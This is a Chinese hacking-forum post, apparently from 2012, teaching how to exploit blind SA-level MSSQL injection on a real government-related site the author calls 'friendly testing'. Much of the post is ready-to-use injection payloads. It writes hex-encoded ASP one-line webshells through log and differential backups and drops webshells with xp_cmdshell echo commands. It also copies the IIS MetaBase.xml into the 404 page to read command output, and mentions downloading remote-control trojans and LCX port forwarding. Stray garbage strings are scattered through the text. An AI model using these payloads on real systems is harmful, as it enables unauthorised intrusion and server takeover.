找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2179|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
5 N9 P: _$ x3 y- x2 E/ S$ z: T4 S9 ?, G4 A4 f( W
5 v" Q' J  A8 K
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。) A3 b. y! J  E5 C- e: A

2 M+ i7 H' d5 l( X$ |                                                                 # }2 U* i' \, [4 z" v# {
                                                                 
3 j2 d7 |" m3 ]4 E) A/ p8 i( A$ ]                                                                  论坛: http://www.90team.net/# B/ W! ], U7 s6 k# O7 r
, Z7 X2 }% X3 q% H+ x, I  u

4 i( Z' }: r3 ^/ p# @4 c
  r; _5 J9 c; a! H0 z( [* D友情检测国家人才网9 @% ^0 R5 ]3 j. B# G3 e

. M- `7 i! N$ d- ~: S$ T& [
) I) M* t& I7 g" y- L1 }9 @! C" c内容:MSSQL注入SA权限不显错模式下的入侵
/ A* \  w8 Z, H/ h1 s
% f' I4 a8 c; h) {4 {! ^* R# C* d( S$ g/ ~
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。- c$ {3 M& y. ~4 [

7 w9 {  l# P4 F+ ~/ I- V  c我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
7 z2 \$ w" @: `  k1 j9 ]* H9 f: V0 t: I# D

& I. _" Q0 V$ T. ^, g* ]) L这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。( a. O5 E5 w8 A8 U- i
7 ~9 W# g" \; q8 f) q
思路:
: {/ s( E" B, `9 C' E8 r% z$ \" h) g+ M# j/ [
首先:( O$ N8 H5 z" b2 k: `, r
( A6 j& C' B1 ~9 q* F
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
% X0 X  b4 G9 Q0 L2 x. o" G" i* p" h: [8 w% i1 d, c0 W
1.日志备份获得Webshell& Q; f0 Q4 J8 Y5 j5 n

" V4 y1 j, \3 L  I7 j" R3 o2.数据库差异备份获得Webshell7 j4 U/ C  x. j! V. A' l* N# E+ P

5 h$ r) n8 `! |1 M# n4.直接下载免杀远控木马。
- |: e: Z* _  f' L# O5 s0 _* a" w% l) x1 Z
5.直接下载LCX将服务器端口转发出来1 R% y9 F6 y2 F; N+ V0 E: Z$ z

+ X9 q# M+ }) [: q- K" [6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。9 D" r3 s! C5 p( U1 \( Z# F* K
1 z% w( o( E' H. u' B  E
6 f3 ?% b$ F5 P) i) k4 a9 F0 f1 T
* A- {, [& D- q5 R
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, ' x! ]) g! q" j& ~, t+ f
: y+ w0 x6 S4 l& c) c  y
我直接演示后面一个方法
' B/ k8 f* n: U1 x: x2 f, B' k/ j
& d! z4 X; C. X& E  ~
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 3 p' ]. F8 f' f) R7 w% {2 ~
, `# {9 A" ]1 i5 s) q8 q
4 n& {* G3 t" O1 J' \& R' a, a

8 e) E6 b8 r( D7 A" g# W/ n: n3 I
◆日志备份:# f' u: w) j6 w7 ?# S- n/ p3 {
! f$ p) g- Q" z: J1 @; R0 v
  Z" G) e0 T' N; C) I1 ~
1. 进行初始备份
/ ~5 j- L# w- \7 `: }' \1 D; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--  n3 K8 f# u; a: S8 z

& V5 p5 O( C& {2. 插入数据
( V/ w2 l0 S) M) \# d;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--1 i; ^  R; N5 F5 }5 f- Y) `

! m( T1 |$ n+ C: r  S% J) t0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
6 J% n- C" o: t6 ~! I8 r5 ^  ( [7 I1 C1 z2 _! a' B
3. 备份并获得文件,删除临时表, l( ^2 i7 q5 Y0 d( n, A
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
  L( p& [! z( u2 a- D1 @4 c
4 S/ p  v( @& S$ w- {4 U2 l3 X' z# Q# j) q

' l, S& S; M7 g8 u3 y" ?◆数据库差异备份
2 u/ z0 q( J: j! v7 z: R9 c
; P' F8 T; R! Z) q% e7 z(1. 进行差异备份准备工作6 Z: M% S! B, N+ \& _
9 c9 t- w+ }! s5 D0 Y# M+ i
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--5 ?) W/ ], w$ s0 B0 \6 P

+ R; c/ E/ j; A" {9 u# O上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
" ^0 V: {0 l' D& Q0 Z' E+ T; i 8 o2 U- L5 D1 ^, Z4 R# Y

+ ]. v( L. y* ^(2. 将数据写入到数据库
( C. I, _: |+ l* w0 c;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- ; U9 X. P2 Q% B
* }5 ?6 u% @) G! m9 G/ z' y2 F0 J
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>2 }9 x) v. k6 w( V% L2 Q
4 H9 q" O% O) n6 t. I
3. 备份数据库并清理临时文件
; [& i& m7 m# O3 W2 H7 Z' f4 h0 {2 i+ z$ ?, i
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--; t; ]  p2 G8 N- D- W# d

( A6 |2 f2 p# X: j, ^0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
  X$ g9 l- S6 D$ |1 t1 ], c
$ p( Z) F9 m; Z) p2 U$ z! w7 C/ X( l4 n8 v  j, _  {

! x' X0 \: C. y( W9 X用^转义字符来写ASP(一句话木马)文件的方法:   ( v4 N6 @5 s! L4 e" ?" O' I
- |. K# i1 D+ R8 W3 D! m" z
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--* Y. ^6 [; C8 P3 |6 o' }( Z
& K. x, E7 f% U8 I" |( Z
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
: l  }2 @% N. c+ H" }  s0 a: k3 m7 O
读取IIS配置信息获取web路径  @. H# n& s$ ?& U+ z7 f
# r* t' j- c" ^+ h; o
     ( u  o4 @# {2 C4 g7 Y+ a0 B$ \- H
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--+ [% \' ?' p7 A% @2 C

3 c- a) W! \: M& ]4 o  y9 R执行命令8 u) A& g( s& o/ m* w
     
$ J& H7 P' \+ g+ t     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
- p. R. @) }7 `
* n9 @0 a% n7 M# g( F9 P0 w4 c3 E3 y0 J, D% n+ m; U
6 G, j$ a) t2 d* M( P3 B+ h

9 I3 ?  i/ N/ S: S  z; p" o! b3 _* g* m* i, l1 p
% C6 E/ z1 O/ ~
4 E0 ^- i1 P  u4 t" Q

) _$ w+ J& ~/ T8 P
0 W" M8 s3 N4 y9 x- F3 P
3 {5 U  X7 M; l
& ]( O4 k/ z: `6 k
' T7 E. J0 I) i( m& g& b; x! Z& Y
% T& a9 S; T& t/ L
) V% y( A9 T+ t5 t

3 Y$ d4 W- z$ N" N7 d" k/ `* n& c% w, {" G0 \/ W/ J( C
- V+ _  O" g/ v5 q, ^5 [) C/ s
8 W0 C+ E  E% ~8 {8 Z* z

0 C* `8 [7 [. O" k
- @  D/ F5 r8 P% t- m- t4 n+ p- G* @$ U
7 V0 W  V1 |0 C9 B, K
5 Q  ^+ w8 d7 {5 M

: I! X6 c# z! r. F' J# l, m& S# `: p; \' W& g
! _3 R" C0 \. ~
, s% g8 S2 J1 \+ V
' ^% c! [1 R2 b3 G3 c8 Q
3 u# c; {% `4 R: |- Q. t
# Z! Y. ~. w$ A+ t$ b

1 v( Z* h7 W5 V# u! B
$ [# ]. X: U( J4 B
% y3 C  K$ n5 j1 X1 |  @6 Z; e
" U/ o2 D3 _( J% G  S$ s& S8 N, V$ `* s- b9 U7 J3 ~! y( _
; N# u$ l/ H+ J) P8 A
* \6 n$ S7 b, G  e1 _( s
8 O- \# j2 a0 ]! B/ Q

' u) u8 d3 b' o4 U) q% Q
% c( M/ A; ]. U3 I/ n+ M4 R
/ C5 Q: T8 [* p. i0 m' r; y# x" C& ~& O; Q
( B: w; A& j. @" p, z: j, k5 ]% z

0 i4 D. Q4 y9 I; D: o$ ^/ G! h
9 d" |  V2 q9 h/ a' d. J+ o& r
2 ]- L9 Q, f7 V4 L9 R2 X* ^( {5 n9 D
/ H, a3 @$ e6 W; h0 }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表